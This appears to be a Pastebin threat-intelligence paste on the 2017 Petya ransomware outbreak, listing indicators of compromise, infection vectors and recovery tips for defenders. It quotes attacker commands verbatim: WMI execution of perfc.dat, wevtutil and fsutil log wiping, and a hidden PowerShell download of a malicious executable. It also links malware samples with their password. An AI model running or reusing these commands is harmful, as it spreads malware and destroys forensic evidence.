Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- #petya #petrWrap
- Ransomware attack.
- Got new info? Email at isox@vulners.com
- *********** Bitcoin wallet monitoring
- https://blockchain.info/address/1Mz7153HMuxXTuR2R1t78mGSdzaAtNbBWX
- *********** Possible malware files:
- https://yadi.sk/d/S0-ZhPY53KWc84
- https://yadi.sk/d/Zpkm88sp3KWc8v
- Archive password: virus
- *********** Vulnerabilities/Vectors/Actions:
- MS17-010: https://vulners.com/search?query=ms17-010%20order:published
- PSEXEC: %PROGRAMDATA%\dllhost.dat is dropped and is legit PSEXEC bin
- Remote WMI, “process call create \"C:\\Windows\\System32\\rundll32.exe \\\"C:\\Windows\\perfc.dat\\\" #1”
- Log clean, «wevtutil cl Setup & wevtutil cl System & wevtutil cl Security & wevtutil cl Application & fsutil usn deletejournal /D %c:»
- Creates a scheduled task that reboots 1 hour after infection. If task removed before the hour, does not reschedule and can buy time
- *********** Possible IP addresses:
- 185.165.29.78
- 84.200.16.242
- 111.90.139.247
- 95.141.115.108
- *********** Email:
- wowsmith123456@posteo.net
- *********** Malware dropped file:
- http://185.165.29.78/~alex/svchost.exe
- *********** Analysis:
- https://virustotal.com/fr/file/027cc450ef5f8c5f653329641ec1fed91f694e0d229928963b30f6b0d7d3a745/analysis/
- https://www.hybrid-analysis.com/sample/027cc450ef5f8c5f653329641ec1fed91f694e0d229928963b30f6b0d7d3a745?environmentId=100
- https://twitter.com/PolarToffee/status/879709615675641856
- *********** Hashes by codexgigas team:
- For 185.165.29.78, we have:
- a809a63bc5e31670ff117d838522dec433f74bee
- bec678164cedea578a7aff4589018fa41551c27f
- d5bf3f100e7dbcc434d7c58ebf64052329a60fc2
- aba7aa41057c8a6b184ba5776c20f7e8fc97c657
- 0ff07caedad54c9b65e5873ac2d81b3126754aac
- 51eafbb626103765d3aedfd098b94d0e77de1196
- 078de2dc59ce59f503c63bd61f1ef8353dc7cf5f
- As droppers
- And for 84.200.16.242:
- 7ca37b86f4acc702f108449c391dd2485b5ca18c
- 2bc182f04b935c7e358ed9c9e6df09ae6af47168
- 1b83c00143a1bb2bf16b46c01f36d53fb66f82b5
- 82920a2ad0138a2a8efc744ae5849c6dde6b435d
- *********** Targeted extensions by @GasGeverij
- .3ds.7z.accdb.ai.asp.aspx.avhd.back.bak.c.cfg.conf.cpp.cs.ctl.dbf.disk.djvu.doc.docx.dwg.eml.fdb.gz.h.hdd.kdbx.mail.mdb.msg.nrg.ora.ost.ova.ovf.pdf.php.pmf.ppt.pptx.pst.pvi.py.pyc.rar.rtf.sln.sql.tar.vbox.vbs.vcb.vdi.vfd.vmc.vmdk.vmsd.vmx.vsdx.vsv.work.xls.xlsx.xvd.zip.
- *********** Potential (IOC) (No proof!!!) by Ukraine researchers, received 27th morning
- - - - - - - - - - - - - - - - - - - - - - - - -
- File Name Order-20062017.doc (RTF із CVE-2017-0199)
- MD5 Hash Identifier 415FE69BF32634CA98FA07633F4118E1
- SHA-1 Hash Identifier 101CC1CB56C407D5B9149F2C3B8523350D23BA84
- SHA-256 Hash Identifier FE2E5D0543B4C8769E401EC216D78A5A3547DFD426FD47E097DF04A5F7D6D206
- File Size 6215 bytes
- File Type Rich Text Format data
- Connects to the host:
- 84.200.16.242 80
- h11p://84.200.16.242/myguy.xls
- File Name myguy.xls
- MD5 Hash Identifier 0487382A4DAF8EB9660F1C67E30F8B25
- SHA-1 Hash Identifier 736752744122A0B5EE4B95DDAD634DD225DC0F73
- SHA-256 Hash Identifier EE29B9C01318A1E23836B949942DB14D4811246FDAE2F41DF9F0DCD922C63BC6
- File Size 13893 bytes
- File Type Zip archive data
- mshta.exe %WINDIR%\System32\mshta.exe" "C:\myguy.xls.hta" " (PID: 2324)
- powershell.exe -WindowStyle Hidden (New-Object System.Net.WebClient).DownloadFile('h11p://french-cooking.com/myguy.exe', '%APPDATA%\10807.exe');" (PID: 2588, Additional Context: ( System.Net.WebClient).DownloadFile('h11p://french-cooking.com/myguy.exe', '%APPDATA%\10807.exe') ;)
- 10807.exe %APPDATA%\10807.exe" " (PID: 3096)
- File Name BCA9D6.exe
- MD5 Hash Identifier A1D5895F85751DFE67D19CCCB51B051A
- SHA-1 Hash Identifier 9288FB8E96D419586FC8C595DD95353D48E8A060
- SHA-256 Hash Identifier 17DACEDB6F0379A65160D73C0AE3AA1F03465AE75CB6AE754C7DCB3017AF1FBD
- File Size 275968 bytes
- !!!! Unproofed
- Connects to the host:
- 111.90.139.247 80
- COFFEINOFFICE.XYZ 80
- Pay attention - the trojan on which I give the markers could potentially be used to load the encryption part.
- *********** IOС by Informzachita (infosec.ru)
- type,value,comment,to_ids,date
- Payload delivery,md5,"71b6a493388e7d0b40c83ce903bc6b04","",1,20170627
- Payload delivery,sha256,"027cc450ef5f8c5f653329641ec1fed91f694e0d229928963b30f6b0d7d3a745","",1,20170627
- Payload delivery,sha256,"64b0b58a2c030c77fdb2b537b2fcc4af432bc55ffb36599a31d418c7c69e94b1","https://otx.alienvault.com/pulse/59525e7a95270e240c055ead/",1,20170627
- Payload delivery,sha1,"34f917aaba5684fbe56d3c57d48ef2a1aa7cf06d","",1,20170627
- Payload delivery,malware-sample,"027cc450ef5f8c5f653329641ec1fed91f694e0d229928963b30f6b0d7d3a745.bin|71b6a493388e7d0b40c83ce903bc6b04","Petya sample",1,20170627
- Payload delivery,filename|sha1,"027cc450ef5f8c5f653329641ec1fed91f694e0d229928963b30f6b0d7d3a745.bin|34f917aaba5684fbe56d3c57d48ef2a1aa7cf06d","Petya sample",1,20170627
- Payload delivery,filename|sha256,"027cc450ef5f8c5f653329641ec1fed91f694e0d229928963b30f6b0d7d3a745.bin|027cc450ef5f8c5f653329641ec1fed91f694e0d229928963b30f6b0d7d3a745","Petya sample",1,20170627
- Payload delivery,filename|md5,"Order-20062017.doc|415fe69bf32634ca98fa07633f4118e1","delivery",0,20170627
- Payload delivery,filename|sha1,"Order-20062017.doc|101cc1cb56c407d5b9149f2c3b8523350d23ba84","delivery",1,20170627
- Payload delivery,filename|sha256,"Order-20062017.doc|fe2e5d0543b4c8769e401ec216d78a5a3547dfd426fd47e097df04a5f7d6d206","delivery",1,20170627
- Payload delivery,vulnerability,"CVE-2017-0199","Order-20062017.doc",0,20170627
- Payload delivery,filename|md5,"myguy.xls|0487382a4daf8eb9660f1c67e30f8b25","",1,20170627
- Payload delivery,filename|sha256,"myguy.xls|ee29b9c01318a1e23836b949942db14d4811246fdae2f41df9f0dcd922c63bc6","",1,20170627
- Payload delivery,sha1,"a809a63bc5e31670ff117d838522dec433f74bee","droppers",1,20170627
- Payload delivery,sha1,"d5bf3f100e7dbcc434d7c58ebf64052329a60fc2","droppers",1,20170627
- Payload delivery,sha1,"aba7aa41057c8a6b184ba5776c20f7e8fc97c657","droppers",1,20170627
- Payload delivery,sha1,"bec678164cedea578a7aff4589018fa41551c27f","droppers",1,20170627
- Payload delivery,sha1,"078de2dc59ce59f503c63bd61f1ef8353dc7cf5f","droppers",1,20170627
- Payload delivery,sha1,"0ff07caedad54c9b65e5873ac2d81b3126754aac","droppers",1,20170627
- Payload delivery,sha1,"51eafbb626103765d3aedfd098b94d0e77de1196","droppers",1,20170627
- Payload delivery,sha1,"82920a2ad0138a2a8efc744ae5849c6dde6b435d","droppers",1,20170627
- Payload delivery,sha1,"1b83c00143a1bb2bf16b46c01f36d53fb66f82b5","droppers",1,20170627
- Payload delivery,sha1,"7ca37b86f4acc702f108449c391dd2485b5ca18c","droppers",1,20170627
- Payload delivery,sha1,"2bc182f04b935c7e358ed9c9e6df09ae6af47168","droppers",1,20170627
- Payload delivery,filename|md5,"BCA9D6.exe|a1d5895f85751dfe67d19cccb51b051a","",1,20170627
- Payload delivery,filename|sha1,"BCA9D6.EXE|9288fb8e96d419586fc8c595dd95353d48e8a060","",1,20170627
- Payload delivery,filename|sha256,"BCA9D6.exe|17dacedb6f0379a65160d73c0ae3aa1f03465ae75cb6ae754c7dcb3017af1fbd","",1,20170627
- Payload installation,filename|sha1,"myguy.xls|736752744122a0b5ee4b95ddad634dd225dc0f73","",1,20170627
- Payload delivery,filename,"dllhost.dat","",1,20170627
- External analysis,filename|sha1,"myguy.exe|9288fb8e96d419586fc8c595dd95353d48e8a060","",1,20170627
- External analysis,filename|sha256,"myguy.exe|17dacedb6f0379a65160d73c0ae3aa1f03465ae75cb6ae754c7dcb3017af1fbd","",1,20170627
- External analysis,malware-sample,"myguy.exe|a1d5895f85751dfe67d19cccb51b051a","",1,20170627
- External analysis,malware-sample,"svchost.exe|d2ec63b63e88ece47fbaab1ca22da1ef","possible sample",1,20170627
- External analysis,filename|sha256,"svchost.exe|e5c643f1d8ecc0fd739d0bbe4a1c6c7de2601d86ab0fff74fd89c40908654be5","possible sample",1,20170627
- External analysis,filename|sha1,"svchost.exe|dd52fcc042a44a2af9e43c15a8e520b54128cdc8","possible sample",1,20170627
- Network activity,url,"http://185.165.29.78/~alex/svchost.exe","",1,20170627
- Network activity,url,"http://84.200.16.242/myguy.xls","",1,20170627
- Network activity,ip-dst|port,"84.200.16.242|80","Order-20062017.doc",1,20170627
- Network activity,email-dst,"wowsmith123456@posteo.net","",1,20170627
- Network activity,url,"http://french-cooking.com/myguy.exe","",1,20170627
- Network activity,ip-dst|port,"111.90.139.247|80","",1,20170627
- Network activity,domain,"coffeinoffice.xyz","",1,20170627
- Network activity,ip-dst,"95.141.115.108","https://twitter.com/JC_DiazGarcia/status/879719578171060228",1,20170627
- Network activity,ip-dst,"84.200.16.242","https://twitter.com/JC_DiazGarcia/status/879719578171060228",1,20170627
- Network activity,ip-dst,"111.90.139.247","https://twitter.com/JC_DiazGarcia/status/879719578171060228",1,20170627
- Network activity,ip-dst,"185.165.29.78","https://twitter.com/JC_DiazGarcia/status/879719578171060228",1,20170627
- Artifacts dropped,filename,"%WINDIR%\perfc.dat","",1,20170627
- Artifacts dropped,filename,"C:\myguy.xls.hta","",1,20170627
- Artifacts dropped,filename,"%APPDATA%\10807.exe","",1,20170627
- Financial fraud,btc,"1Mz7153HMuxXTuR2R1t78mGSdzaAtNbBWX","",0,20170627
- External analysis,vulnerability,"CVE-2017-0144","",0,20170627
- External analysis,comment,"attack-vector:phishing","",0,20170627
- *********** Has sysinternal utilities signature
- https://twitter.com/ppeepuppy/status/879706271535972353
- *********** Uses the The GetExtendedTcpTable function to get a list of available endpoints
- https://twitter.com/pjcampbe11/status/879709929073979392
- *********** List of extensions targeted
- https://twitter.com/MrCarlMcDade/status/879706580127809536
- *********** Indicates possible usage of PSEXEC, on windows that means the admin$ and c$ shares.
- https://twitter.com/rikvduijn/status/879726410201526272
- *********** It is confirmed that the sample 027cc... contains PSEXEC:
- https://twitter.com/NVISO_Labs/status/879724733696274432
- *********** Friends in Ukraine are telling me this helps to recover from Petya (untested):
- https://twitter.com/msuiche/status/879722894997278720
- bootrec /RebuildBcd
- bootrec /fixMbr
- bootrec /fixboot
- *********** Petya— Enhanced WannaCry? What we know so far.
- https://blog.comae.io/byata-enhanced-wannacry-a3ddd6c8dabb
- *********** Found evidences of post kernel exploitation too: IA32_SYSENTER_EIP after decoding kernel shellcode
- https://twitter.com/msuiche/status/879713211368525824
- *********** #Petya uses long #sleep functions: if infected you have 30-40 mins to turn off your computer to save it from ransom.
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement